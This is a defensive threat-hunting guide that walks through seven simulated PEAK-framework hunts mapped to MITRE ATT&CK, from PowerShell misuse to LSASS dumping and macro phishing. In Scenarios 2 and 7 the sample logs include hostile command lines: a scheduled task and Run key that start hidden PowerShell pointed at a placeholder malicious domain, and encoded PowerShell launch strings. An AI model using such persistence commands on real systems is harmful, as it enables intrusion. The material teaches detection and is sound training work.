USING PEAK

FRAMEWORK FOR
MITRE ATT&CK-
ALIGNED THREAT
HUNTING:
SCENARIOS AND
SIMULATIONS
BY IZZMIER IZZUDDIN
PEAK Threat Hunting

Plan (P), Execute (E), Analyse (A), Communicate (C)

1. PLAN

Purpose: Define what you're hunting for and why. This includes scoping the hunt, setting
hypotheses, selecting data sources and identifying relevant ATT&CK techniques.

Key Activities:

• Define hypotheses: Example — “Attackers may be using valid accounts to maintain

persistence.”
• Scope the hunt: Decide on the time range, systems and users involved.
• Map to MITRE ATT&CK: T1078 - Valid Accounts.
• Identify telemetry sources: Active Directory logs, endpoint authentication logs, VPN
access logs.

2. EXECUTE

Purpose: Use tools and queries to search through the relevant data to validate or refute the
hypothesis.

Key Activities:

• Run queries in the SIEM or log platform (Splunk, ELK, Sentinel).

• Filter out noise and irrelevant events.
• Look for patterns indicating abnormal activity (a user logging in from two countries in 10
minutes).
• Pivot on findings: If you find anomalies, follow the trail (unusual PowerShell execution
after login).

3. ANALYSE

Purpose: Examine the findings, understand what they mean and determine if further action
is needed (escalation or remediation).

Key Activities:

• Enrich findings with threat intelligence (IP reputation, file hashes, etc.).
• Correlate with known TTPs from MITRE ATT&CK or past incidents.
• Assess impact or risk level based on behaviour, assets and user context.
• Document analysis clearly for repeatability.
4. COMMUNICATE

Purpose: Share the findings with relevant stakeholders in an understandable and

actionable format.

Key Activities:

• Write a hunt report including background, hypothesis, methodology, findings, impact

and recommendations.
• Present to IR team, SOC or management depending on severity.
• Recommend improvements to detection rules, logging gaps or defensive controls.
• Feed findings back into SIEM detection rules or SOAR playbooks for automation.

PEAK Example: Threat Hunt for Abnormal Login Behaviour

Step Action
Plan Hypothesis: A compromised account is being used from an unusual
location.
Data Needed: VPN logs, AD login logs, geolocation lookup, user asset
context.
Execute Query: Find logins from foreign countries in past 30 days.
Filter: Exclude known travel or remote workers.
Pivot: Check what the user did after login, any lateral movement,
sensitive file access?
Analyse Result: User A logged in from IP in Russia at 2AM, accessed finance
folder within 5 minutes.
Assessment: Suspicious. Enrichment shows the IP has high-risk score
on threat intel feeds.
Communicate Write report, alert IR, suggest blocking IP and require MFA for user A.

Why Use PEAK

• Encourages hypothesis-driven and repeatable hunts.

• Forces clear documentation and logic-based decisions.
• Promotes collaboration between SOC, IR and engineering teams.
• Builds a consistent hunting culture across analysts and teams.
FULL THREAT HUNTING SIMULATION USING THE PEAK FRAMEWORK

SCENARIO 1: SUSPICIOUS USE OF POWERSHELL VIA COMPROMISED ACCOUNT

Background: A user reports that they received an alert from their email provider about a
login from an unusual location. The user did not initiate that login. A quick check by IT
shows no VPN usage from the user’s laptop at that time. SOC decides to initiate a threat
hunt to identify possible misuse of the user account and detect similar cases across the
organisation.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker has compromised a valid user account and is using native tools
like PowerShell to conduct post-compromise actions such as reconnaissance or lateral
movement.

TTP Reference (MITRE ATT&CK):

• T1078: Valid Accounts

• T1059.001: Command and Scripting Interpreter - PowerShell
• T1087: Account Discovery
• T1021: Remote Services (PS Remoting)

Scope of Hunt:

• Timeframe: Last 7 days

• Data sources: Windows Event Logs (Sysmon, Security), EDR logs, VPN logs
• Target: Users who logged in from anomalous locations or outside working hours

Telemetry to Review:

• Logon events (Event ID 4624, 4625)

• PowerShell execution logs (Sysmon Event ID 1, 4104 from PowerShell Logging)
• VPN authentication logs
• EDR telemetry for process trees and network connections

2. EXECUTE

Logs (Windows Security and Sysmon):

Security Event - Logon Success (4624):

Date: 2025-07-15 02:31:24
Username: iffah
Logon Type: 10 (Remote Interactive)
Source IP: 185.200.45.22 (Unknown Russian IP)
Workstation Name: HOST-1234
Authentication Package: NTLM

Sysmon Event ID 1 - Process Creation:

Date: 2025-07-15 02:33:09

Process: powershell.exe
User: iffah
Parent Process: explorer.exe
Command Line: powershell.exe -nop -w hidden -encodedCommand SQBmACgA...
(base64 encoded)
SHA256: ab12cd34ef56...

Sysmon Event ID 3 - Network Connection:

Date: 2025-07-15 02:34:01

Process: powershell.exe
Destination IP: 91.214.124.17
Destination Port: 443
Protocol: TCP

EDR Alert - Suspicious PowerShell Activity

High-entropy encoded PowerShell command

Attempted download from remote server
Execution of AMSI bypass script

VPN Logs:

No VPN session for iffah at 02:30 to 03:00 on 2025-07-15

Execution Process Summary:

• Logon from suspicious IP

• PowerShell launched within 2 minutes
• Encoded command executed
• Outbound connection made over HTTPS

3. ANALYSE
Investigation Summary:

1. Initial Access Observation: The user iffah logs in at 2:31 AM from an IP address not
geolocated within the organisation’s operating countries. No VPN was used.
2. Anomalous Execution: Immediately after the logon, powershell.exe was launched
with hidden window and no profile, using a Base64 encoded payload. This
technique is typical for evading basic monitoring and logging.
3. Outbound Communication: PowerShell initiated an HTTPS connection to an
untrusted IP. No approved service was expected to communicate with this domain.
4. EDR Correlation: EDR alerted that the PowerShell command was high-entropy and
tried to download additional payloads, indicating possible staging for further
exploitation or exfiltration.
5. No User Confirmation: Upon follow-up, the user confirmed they were not active
during this time and was not aware of any logins from outside Malaysia.

This activity matches known post-compromise behaviours, using valid credentials and
built-in tools for command execution. The rapid sequence from login to PowerShell
execution without MFA usage indicates credential compromise.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Suspicious PowerShell Activity via Compromised

Account
• Date: 2025-07-16
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Valid accounts may be misused to perform PowerShell-based lateral
movement or recon
• Findings:
o User iffah logged in from a suspicious IP without VPN
o Executed obfuscated PowerShell within 2 minutes
o Attempted outbound HTTPS connection to untrusted domain
o EDR detected high-entropy PowerShell script with signs of AMSI bypass
• MITRE Techniques Observed:
o T1078 (Valid Accounts)
o T1059.001 (PowerShell)
o T1105 (Ingress Tool Transfer)
• Recommendations:
1. Disable the account iffah immediately
2. Reset password and enforce MFA
3. Add detection rules for PowerShell with encoded commands
4. Investigate lateral movement to other endpoints during that session
5. Block IPs and domains associated with this activity in proxy/firewall
 6. Schedule full endpoint scan on HOST-1234
7. Consider adding PowerShell logging if not enabled (4104, 4688)
• Next Steps:
Escalate to Incident Response for containment and recovery
Feed hunting queries into detection content
Train SOC analysts on similar TTPs
SCENARIO 2: PERSISTENCE VIA SCHEDULED TASK AND UNUSUAL REGISTRY
MODIFICATION

Background: The SOC receives an alert from the EDR platform indicating that a system had
a PowerShell process that created a scheduled task. The host is not part of any IT
automation or DevOps environment and such behaviour is considered unusual. A hunt is
initiated to find if this activity is part of a broader persistence mechanism.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker has established persistence by creating scheduled tasks and

modifying the registry to ensure malicious code executes after reboot.

TTP Reference (MITRE ATT&CK):

• T1053.005: Scheduled Task

• T1547.001: Registry Run Keys
• T1059.001: PowerShell Execution
• T1055.001: Process Injection (possible follow-up)

Scope of Hunt:

• Timeframe: Last 14 days

• Data sources: Sysmon, Windows Event Logs, Registry modification logs, EDR
telemetry
• Target: All workstations (excluding IT automation servers)

Telemetry to Review:

• Sysmon Event ID 1 (Process Create)

• Sysmon Event ID 13 (Registry Value Set)
• Sysmon Event ID 19–20 (Scheduled Task creation/modification)
• EDR: Process trees, command lines, task creation behaviour

2. EXECUTE

Sysmon Event ID 1 - Process Creation:

Date: 2025-07-13 03:01:52

Process: powershell.exe
Parent Process: explorer.exe
User: hrstaff01
CommandLine: powershell.exe -Command "Register-ScheduledTask -TaskName
'ChromeUpdate' -Action (New-ScheduledTaskAction -Execute 'powershell.exe' -Argument
'-Command Start-Process http://malicious[.]domain') -Trigger (New-ScheduledTaskTrigger
-AtLogOn) -RunLevel Highest"

Sysmon Event ID 13 - Registry Modification:

Date: 2025-07-13 03:03:10

Process: reg.exe
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\chromeup
Value: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Start-
Process http://malicious[.]domain
User: hrstaff01

Sysmon Event ID 19 - Scheduled Task Created:

Date: 2025-07-13 03:01:58

Task Name: ChromeUpdate
Author: hrstaff01
Action Path: powershell.exe
Trigger Type: At Logon

EDR Alert:

• Custom rule triggered: Scheduled task creation by PowerShell

• Registry autorun entry by low-privilege user
• No legitimate software installation in logs

User Activity:

• Host: HR-WS-57
• User: hrstaff01
• Confirmed not installing any application
• System has no known legitimate Chrome task scheduler

3. ANALYSE

Investigation Summary:

1. Scheduled Task Creation:

PowerShell created a task named ChromeUpdate, which sounds legitimate, but the
associated action is launching a PowerShell command that opens a web page from
a suspicious domain.
 2. Registry Persistence:
A registry Run key was created under the current user profile to silently execute
PowerShell at each login, pointing to the same malicious domain.
3. No Corresponding Installer Logs:
No MSI or EXE installation logs were found. The task and registry were not created
by a software update process. The timing indicates it was executed manually or via
a script.
4. TTP Match:
Both Scheduled Task creation (T1053.005) and Registry Run modification
(T1547.001) are classic persistence techniques.
5. Potential Intent:
The goal might be to re-establish access every time the user logs in by fetching
malicious payloads from the attacker-controlled domain.

The observed behaviour strongly indicates an attempt to maintain persistence using

legitimate Windows mechanisms. The use of misleading task names and registry keys
aligns with known stealth techniques and immediate containment is recommended.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Scheduled Task and Registry Persistence via PowerShell
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Malicious actors may use scheduled tasks and registry autoruns to
maintain persistence
• Findings:
o powershell.exe used to create a scheduled task (ChromeUpdate) with
suspicious action
o Registry Run key (chromeup) points to same malicious PowerShell payload
o Activity observed under user hrstaff01 without valid justification
o Domain used in PowerShell script is not whitelisted and appears in open-
source blocklists
• MITRE Techniques Observed:
o T1053.005 (Scheduled Task)
o T1547.001 (Registry Run Key)
o T1059.001 (PowerShell Execution)
• Recommendations:
1. Disable and remove scheduled task and registry entry
2. Block http://malicious.domain at firewall/proxy
3. Run full malware scan on host HR-WS-57
4. Reset user credentials for hrstaff01
5. Monitor for similar behaviour across other endpoints
 6. Implement alerts for non-approved scheduled tasks and registry autoruns
• Next Steps:
o Review Group Policy to restrict registry editing and task creation
o Add logic to EDR/SIEM for early detection of PowerShell-based persistence
o Share findings with IR and malware analysis team to check for deeper
implants
SCENARIO 3: EXFILTRATION VIA CLOUD STORAGE (GOOGLE DRIVE OR DROPBOX)

Background: During routine proxy log review, the security team notices large outbound
data transfers to Google Drive from a workstation that does not typically use cloud storage.
The endpoint belongs to a user in the finance department. A threat hunt is launched to
determine whether this activity is legitimate or a sign of data exfiltration.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An insider or external actor with access to a compromised workstation is

exfiltrating sensitive data (financial reports) to unauthorised cloud storage platforms such
as Google Drive or Dropbox.

TTP Reference (MITRE ATT&CK):

• T1567.002: Exfiltration to Cloud Storage

• T1071.001: Application Layer Protocol – Web Traffic (HTTPS)
• T1041: Exfiltration Over C2 Channel
• T1059: Command and Scripting Interpreter (PowerShell, etc.)

Scope of Hunt:

• Timeframe: Last 7 days

• Data sources: Proxy logs, EDR, DLP logs, file access logs
• Focus: Outbound connections to cloud storage from sensitive departments
(Finance, Legal)

Telemetry to Review:

• Web proxy logs (URL, method, byte count)

• EDR logs for file movement and cloud sync activity
• Windows file access logs (if available)
• Data Loss Prevention (DLP) violations or attempts

2. EXECUTE

Proxy Log Entry:

Date: 2025-07-18 10:22:51

Source IP: 192.168.45.88 (FIN-WS-02)
User: finance_mgr01
URL: https://drive.google.com/upload
Method: POST
Bytes Out: 452,000,000
Bytes In: 1,200
User-Agent: Chrome/115.0
Category: Cloud Storage

Follow-up Logs:

- 7 separate POST requests to drive.google.com totaling ~3.5 GB

- Activity occurred outside regular working hours: 6:30 PM to 9:00 PM
- No legitimate GDrive use recorded from this user in the past 3 months

EDR File Activity Log:

User: finance_mgr01
Host: FIN-WS-02
Date: 2025-07-18
Observed Activity:
- Accessed directory "D:\Company_Financials_2023"
- Zipped multiple Excel and PDF files (~500MB total)
- Compressed file named: "project_docs.zip"
- File opened via Chrome shortly before upload

DLP Events:

No block action was taken, but large file movement detected

Policy Violation: "Attempted transfer of sensitive files to cloud storage"
Confidence Score: High

3. ANALYSE

Investigation Summary:

1. Unusual Upload Behaviour:

Proxy logs indicate large uploads to Google Drive over HTTPS from a user account
that does not normally use cloud storage.
2. Time Anomaly:
Uploads occurred outside working hours (after 6PM), which is uncommon for this
user and department.
3. File Access Analysis:
EDR showed that the user zipped confidential financial files before uploading them.
The filenames match sensitive financial reports.
 4. No Whitelisting:
Google Drive is not a sanctioned platform for file transfers in the finance
department.
5. No Malware Indicators:
No malware or script execution was found. Indicates this may be an insider action
rather than a remote attacker.

The activity shows clear indicators of potential data exfiltration by a legitimate user
account. This may be an insider threat or unauthorised personal action.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Potential Insider Data Exfiltration to Google Drive
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Threat actor may use unsanctioned cloud storage platforms to
exfiltrate sensitive company data
• Findings:
o finance_mgr01 uploaded 3.5 GB of data to Google Drive outside normal
hours
o Activity originated from FIN-WS-02, confirmed to be the user's workstation
o Zipped confidential financial files found in local access logs
o No malware or unauthorised tools found; activity was performed using
native apps (Chrome, Zip utility)
o Google Drive is not authorised for use in Finance; violates policy
• MITRE Techniques Observed:
o T1567.002 (Exfiltration to Cloud Storage)
o T1071.001 (Web Protocol – HTTPS)
o T1041 (Exfiltration Over C2 Channel – interpreted here via browser over
HTTPS)
• Recommendations:
1. Escalate to HR and Legal for insider risk investigation
2. Disable Google Drive access at the firewall for non-whitelisted roles
3. Monitor large outbound transfers to cloud apps
4. Deploy DLP block policy for ZIPs containing sensitive keywords
5. Interview the user to determine intent and access legitimacy
6. Review past 90 days of this user’s proxy and file activity for pattern
• Next Steps:
o Inform data protection officer (DPO) and compliance teams
o Integrate this TTP into insider threat monitoring dashboards
o Conduct awareness campaign on proper data handling in sensitive
departments
SCENARIO 4: CREDENTIAL DUMPING VIA LSASS ACCESS ON PRIVILEGED HOST

Background: EDR detects a rare access attempt to lsass.exe (Local Security Authority
Subsystem Service) memory from a process on a domain controller. This action is a known
technique used to dump credentials using tools like Mimikatz. A hunt is initiated to
determine whether other similar credential dumping attempts have occurred across
critical systems.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker is attempting to dump credentials from memory on high-value

systems such as domain controllers by accessing lsass.exe using credential dumping
tools or abusing native functionality.

TTP Reference (MITRE ATT&CK):

• T1003.001: OS Credential Dumping – LSASS Memory

• T1055: Process Injection
• T1082: System Information Discovery
• T1569.002: Service Execution (if lateral movement was used)

Scope of Hunt:

• Timeframe: Past 10 days

• Target Systems: Domain Controllers and Tier 0 Servers
• Data Sources: EDR logs, Sysmon (Event ID 10 for process access), Windows
Security Logs
• Focus: lsass.exe accessed by any non-system process

Telemetry to Review:

• EDR detections and process access logs

• Sysmon logs for suspicious access to lsass.exe
• Security Event Logs for process creation and injection
• LSASS memory dump indicators (MiniDumpWriteDump, dbghelp.dll usage)

2. EXECUTE

Sysmon Event ID 10 – Process Access:

Date: 2025-07-15 01:44:22

Source Process: c:\windows\temp\svcdiaghost.exe
Source PID: 5524
Target Process: lsass.exe
Target PID: 564
Granted Access: 0x1410
User: svc-backup
Host: DC-01

Sysmon Event ID 1 – Process Creation:

Date: 2025-07-15 01:43:51

Process Name: svcdiaghost.exe
Parent: cmd.exe
Command Line: svcdiaghost.exe -minidump
SHA256: b1e92c44f3...
Signed: False

EDR Alert:

• Alert: Unauthorised memory access to LSASS detected

• Classification: Suspicious process not whitelisted accessing critical process
memory
• Risk: High
• Action: Logged only (no automatic remediation configured)

Security Log – Service Account Activity:

User: svc-backup
Logged in interactively at 01:40:00
Unusual time for scheduled tasks
No interactive login history in past 30 days

VirusTotal Scan (Hash):

• Result: 25/69 engines detect svcdiaghost.exe as Mimikatz variant

3. ANALYSE

Investigation Summary:

1. Unusual Process on Domain Controller:

svcdiaghost.exe is not part of any approved software list and appeared on DC-01
under a service account (svc-backup) that does not require interactive login.
 2. Access to LSASS Memory:
Sysmon confirms it accessed lsass.exe with full read permissions. This aligns with
techniques used for dumping credentials.
3. Unsigned and Suspicious Binary:
Binary is unsigned, executed from C:\Windows\Temp and flagged as malicious on
VirusTotal.
4. Account Behaviour:
The account svc-backup shows an unusual interactive login. It normally runs
scheduled jobs without login requirement.
5. No Prior Detection:
This was the first detection; no prior alerts were logged for this account or process,
implying a new intrusion or lateral movement.

Evidence strongly suggests credential dumping was attempted using a malicious binary
disguised as a system utility. The attacker likely compromised svc-backup and used it to
deploy Mimikatz on a domain controller.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Credential Dumping Attempt on Domain Controller

• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Adversary may attempt to dump credentials by accessing LSASS
memory on privileged systems
• Findings:
o svcdiaghost.exe accessed lsass.exe on domain controller DC-01
o Unsigned binary executed by svc-backup, an account not authorised for
interactive use
o Command-line and behaviour match known credential dumping tools
(Mimikatz)
o VirusTotal scan confirmed malicious nature of binary
o No scheduled task or legitimate reason found for this execution
• MITRE Techniques Observed:
o T1003.001 (LSASS Credential Dumping)
o T1055 (Process Injection)
o T1078 (Valid Accounts – service account misuse)
• Recommendations:
1. Disable svc-backup account and rotate all service account credentials
2. Isolate DC-01 from the network for forensic investigation
3. Search all endpoints for presence of svcdiaghost.exe
4. Deploy detection rules for access to lsass.exe by non-authorised processes
5. Enable LSA protection on domain controllers to prevent LSASS dumping
 6. Enable Credential Guard on all privileged systems
• Next Steps:
o Escalate to Incident Response for full containment and investigation
o Update EDR policies to auto-block similar LSASS access attempts
o Conduct AD audit to ensure no other compromised service accounts exist
o Deploy threat hunting queries across all domain controllers
SCENARIO 5: DOMAIN GENERATION ALGORITHM (DGA)-BASED C2 BEACONING

Background: Threat intelligence team reports a known malware family in the region is using
Domain Generation Algorithm (DGA) domains for command and control (C2)
communication. DGA domains are pseudo-randomly generated and used by malware to
evade static domain blocking. The SOC launches a proactive threat hunt to detect such C2
activity in the environment.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An infected endpoint is communicating with DGA-generated domains to

maintain contact with its command-and-control server, which may indicate an ongoing or
staged compromise.

TTP Reference (MITRE ATT&CK):

• T1071.004: Application Layer Protocol – DNS

• T1568.002: Dynamic Resolution (DGA)
• T1008: Fallback Channels
• T1105: Ingress Tool Transfer

Scope of Hunt:

• Timeframe: Last 14 days

• Data sources: DNS logs, firewall logs, proxy logs, threat intel feeds
• Focus: Workstations and servers with unusual DNS query patterns

Telemetry to Review:

• DNS requests per endpoint

• Entropy and domain score for randomness
• Frequency and volume of unique DNS queries
• Newly observed domains not in corporate allowlist
• EDR alerts on post-DNS activity

2. EXECUTE

DNS Logs from Endpoint (HR-WS-32):

Timestamp: 2025-07-14 13:22:01

Source IP: 10.10.34.78
Queried Domain: xf3ziueqpp.com
Query Type: A
Response: NXDOMAIN
Resolution Time: 25ms
---
Timestamp: 2025-07-14 13:22:21
Domain: bns83eqkdsm.org
NXDOMAIN
---
Timestamp: 2025-07-14 13:23:01
Domain: aepq9982jkl.co
NXDOMAIN

Pattern:

• 60+ NXDOMAIN responses from the same host in 5 minutes

• Each domain is <12 characters, alphanumeric, non-dictionary
• No matches in known good allowlist
• Domain entropy score: >0.98

Firewall Log:

• No actual connection established (NXDOMAIN), but outbound HTTP/HTTPS

attempted to resolved domains when a domain responded with a valid IP

EDR Telemetry:

• Process: svchost.exe
• Network: Attempted HTTP POST to vbn9ezqmnm.biz
• File dropped: update-checker.dll in C:\Users\Public\Downloads
• File hash flagged by 7/71 engines on VirusTotal

Threat Intel Lookup:

• DGA patterns consistent with malware family: Pykspa variant

• Infrastructure linked to known botnet nodes

3. ANALYSE

Key Findings:

1. Excessive NXDOMAIN Requests:

DNS logs reveal a high volume of failed queries to randomly generated domains.
Normal systems do not exhibit this pattern, especially in such short intervals.
 2. Entropy and Non-Dictionary Domains:
Domains queried are high-entropy, non-human-readable and are not associated
with any known legitimate services or CDNs.
3. EDR Detection of Suspicious POST Request:
One domain (vbn9ezqmnm.biz) resolved successfully and was contacted via
svchost.exe making a POST request, which is abnormal for that process.
4. Dropped File Indicators:
The dropped file update-checker.dll appears in a public folder, flagged as
suspicious and unrelated to any known patching agent.

The endpoint HR-WS-32 is likely infected with a malware that uses DGA for beaconing.
While most domains failed to resolve (NXDOMAIN), one successful hit indicates active C2
communication, possibly downloading payloads or awaiting further instructions.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – DGA-Based Beaconing Detected on Host HR-WS-32

• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Malicious software on endpoint may be using DGA to attempt C2
communication with attacker infrastructure
• Findings:
o Over 60 unique, high-entropy DNS queries from HR-WS-32 in short time
window
o Domains not in whitelist, returned NXDOMAIN responses except one
o EDR confirmed svchost.exe made outbound connection to resolved domain
and downloaded DLL
o Threat intel linked the domain and DGA pattern to known Pykspa botnet
family
• MITRE Techniques Observed:
o T1568.002 (Domain Generation Algorithm)
o T1071.004 (DNS-based C2 Communication)
o T1105 (File Transfer)
o T1059.003 (Possible WMI or system service abuse via svchost)
• Recommendations:
1. Isolate host HR-WS-32 immediately
2. Submit update-checker.dll for deep malware analysis
3. Block outbound DNS requests to high-entropy, non-allowlisted domains
4. Implement rate-limiting or alerting on NXDOMAIN frequency per host
5. Reimage affected host if malware confirmed
6. Deploy DNS tunneling and DGA detection algorithms in DNS security
platform
• Next Steps:
o Cross-check DNS logs across all hosts for same DGA domain pattern
o Share detection logic with threat intel feeds
o Build SIEM use case for high-frequency NXDOMAIN anomalies
SCENARIO 6: LATERAL MOVEMENT USING REMOTE DESKTOP PROTOCOL (RDP) WITH
STOLEN CREDENTIALS

Background: SOC receives a brute-force detection alert for RDP login attempts to a
domain-joined workstation. The alert indicates successful login after several failed
attempts. SOC suspects lateral movement using stolen or brute-forced credentials and
launches a threat hunt to uncover the extent of compromise.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker has gained access to a valid domain user account and is moving
laterally through the network using RDP to access multiple systems.

TTP Reference (MITRE ATT&CK):

• T1078: Valid Accounts

• T1021.001: Remote Services – RDP
• T1059.001: Command and Scripting Interpreter – PowerShell
• T1087: Account Discovery
• T1047: Windows Management Instrumentation (WMI)

Scope of Hunt:

• Timeframe: Past 7 days

• Data sources: Windows Security Event Logs, Sysmon logs, EDR logs, Active
Directory logs
• Target: Domain workstations and servers receiving inbound RDP from newly
compromised hosts

Telemetry to Review:

• Event ID 4625 (Logon Failed) and 4624 (Logon Success – Type 10)
• Network connections from new RDP clients
• Account usage anomalies (logins from multiple systems)
• EDR for PowerShell/WMI execution post-RDP

2. EXECUTE

Windows Event Logs – RDP Brute Force and Success:

Event ID 4625 (Failed Logon):

Date: 2025-07-18 01:12:34
Account: temp_admin
Source IP: 10.10.22.88
Failure Reason: Unknown username or bad password
Failure Count: 15 attempts in 5 minutes

Event ID 4624 (Successful Logon):

Date: 2025-07-18 01:19:11
Account: temp_admin
Source IP: 10.10.22.88
Logon Type: 10 (RemoteInteractive)
Workstation: ENG-WS-22

Lateral Movement Observation:

• From ENG-WS-22, same account logs in via RDP to:

o FIN-WS-03 at 01:30
o HR-WS-09 at 01:44
• No interactive use of temp_admin before this date

EDR Logs – Post-Login Actions:

Host: HR-WS-09
Process Created: powershell.exe
Command Line: powershell -enc JAB...
Observed downloading script from pastebin.com
Process Parent: mstsc.exe
User: temp_admin

AD Logs – Unusual Group Enumeration:

User: temp_admin
Queried domain group memberships via WMI
Queried logged-on users on multiple hosts using PowerShell remoting

GeoIP and Timing Context:

• Activity occurred during midnight shift

• IP address is internal, indicating pivot from already compromised host

3. ANALYSE

Summary of Findings:
 1. Credential Misuse Detected:
temp_admin experienced a brute-force login pattern, followed by a successful login
from a new internal IP (10.10.22.88), indicating stolen or cracked credentials.
2. Lateral Movement Pattern:
RDP logins from ENG-WS-22 to other sensitive endpoints show coordinated
movement. Logon Type 10 confirms RDP usage.
3. Command Execution:
EDR confirms that after each RDP session, PowerShell was executed to run an
encoded script and enumerate user groups—typical recon post-access.
4. Tool Download via Pastebin:
PowerShell was used to pull a script from an external pastebin service, likely stage 2
payload or recon module.
5. No Legitimate Purpose:
temp_admin was not known to be in use recently and has no audit trail before this
date. Its presence on multiple endpoints within an hour is abnormal.

This is a clear case of credential misuse and lateral movement via RDP, followed by recon
and possibly payload staging using PowerShell.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Lateral Movement Using RDP and Stolen Credentials
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Threat actor may be using compromised domain credentials to pivot
via RDP across internal systems
• Findings:
o Brute-force pattern detected followed by successful RDP login with
temp_admin
o Lateral RDP connections observed to multiple endpoints within a short time
o PowerShell scripts executed post-login to enumerate users and groups
o External script download attempted from pastebin, indicating potential tool
staging
o No authorised task associated with the use of temp_admin on these systems
• MITRE Techniques Observed:
o T1078 (Valid Accounts)
o T1021.001 (Remote Services: RDP)
o T1087 (Account Discovery)
o T1059.001 (PowerShell)
• Recommendations:
1. Disable and reset password for temp_admin
2. Audit and remove dormant admin accounts across the domain
 3. Isolate affected endpoints: ENG-WS-22, FIN-WS-03, HR-WS-09
4. Block outbound access to pastebin.com and similar sites on user endpoints
5. Enable MFA or restrict RDP access to privileged jump servers only
6. Deploy alerts for excessive RDP attempts and encoded PowerShell post-RDP
• Next Steps:
o Escalate to IR for full triage
o Review firewall and DNS logs for any further outbound C2 activity
o Integrate detection rules into SIEM for brute force + lateral movement combo
SCENARIO 7: INITIAL ACCESS VIA MALICIOUS EMAIL ATTACHMENT (PHISHING WITH
MACRO-ENABLED WORD DOCUMENT)

Background: The SOC receives a report from the email security gateway showing multiple
users received an email from a spoofed internal domain. The attachment is a .docm
(macro-enabled Word file) and one user opened the file. No alerts were triggered by
antivirus or EDR, prompting a manual threat hunt to determine whether execution led to
compromise.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: A phishing email was used to deliver a malicious macro-enabled document. A

user executed the macro, which led to initial access for the attacker, possibly launching
PowerShell or other malicious tools.

TTP Reference (MITRE ATT&CK):

• T1566.001: Spearphishing Attachment

• T1203: Exploitation for Client Execution (via Office macros)
• T1059.001: Command and Scripting Interpreter – PowerShell
• T1055: Process Injection
• T1105: Ingress Tool Transfer

Scope of Hunt:

• Timeframe: Last 5 days

• Target: All endpoints that received the phishing email
• Data sources: Email logs, EDR telemetry, Office macro logs (if available), Sysmon
• Focus: User who opened the file (finance_exec01) on host FIN-WS-04

Telemetry to Review:

• Email headers and attachment metadata

• Process creation logs (macro spawning PowerShell or CMD)
• Child processes of winword.exe
• Network connections from user workstation

2. EXECUTE

Email Security Log:

Date: 2025-07-17 10:12:20

From: ceo@company-update[.]com
To: [email protected]
Subject: Salary Adjustment FY2025
Attachment: salary_update_fy2025.docm
SPF: fail
DKIM: fail
Detected by Gateway: Low reputation, not quarantined (initial rule set to alert only)

Endpoint EDR Logs (FIN-WS-04):

Process Tree:

winword.exe
└── powershell.exe -nop -w hidden -exec bypass -enc SQBmACgAJAB...
└── rundll32.exe launch.dll,EntryPoint

Sysmon Event ID 1 – Process Creation:

Date: 2025-07-17 10:13:04

Parent Process: winword.exe
Command Line: powershell.exe -w hidden -enc <base64 encoded>
User: finance_exec01
SHA256: abcd1234... (powershell script matches known malware signature on VT)

Sysmon Event ID 3 – Network Connection:

Process: rundll32.exe
Destination: 89.45.78.120
Port: 443
Protocol: TCP
Country: Netherlands

EDR Detection:

• Powershell launched by Office app

• Encoded command executed
• DLL dropped in C:\Users\Public\Loader\launch.dll
• File hash flagged by 33/71 engines on VirusTotal
• Suspicious TLS connection established via rundll32.exe

3. ANALYSE

Findings:
 1. Email as Entry Point:
Email was delivered using a spoofed domain (company-update.com) and passed
basic checks due to misconfigured SPF policy. Attachment was .docm.
2. Execution of Malicious Macro:
User opened the file; winword.exe launched PowerShell with base64-encoded
command that created a DLL and executed it using rundll32.exe.
3. External Communication:
The DLL initiated an HTTPS connection to an IP with no known business justification
and is tied to malware infrastructure.
4. AV and EDR:
Antivirus did not block it due to evasion techniques. EDR flagged it after the
execution chain was completed.
5. Scope Limitation:
Only one user confirmed to have opened the file. No lateral movement yet
observed.

User executed a malicious macro that allowed code execution and remote access via DLL.
This activity represents initial access and may lead to further exploitation if not contained.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Malicious Macro Document Executed via Phishing Email
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Email phishing delivered macro-enabled document that resulted in
initial access via PowerShell
• Findings:
o Email with spoofed sender and .docm attachment reached multiple users
o User finance_exec01 opened the file on FIN-WS-04
o winword.exe spawned obfuscated PowerShell
o DLL file dropped and executed using rundll32.exe, then made outbound C2
connection
o DLL and PowerShell hash matched known malware on VirusTotal
o EDR flagged behaviour post-execution
• MITRE Techniques Observed:
o T1566.001 (Spearphishing Attachment)
o T1203 (Office Macro Execution)
o T1059.001 (PowerShell)
o T1105 (DLL Download and Execution)
• Recommendations:
1. Isolate host FIN-WS-04 and begin forensic analysis
2. Remove launch.dll and scan for other payloads
 3. Block external IPs and domains contacted by DLL
4. Reconfigure email gateway to block macro-enabled Office files
5. Strengthen SPF/DKIM/DMARC policies
6. Educate users on phishing risks, especially with attachments
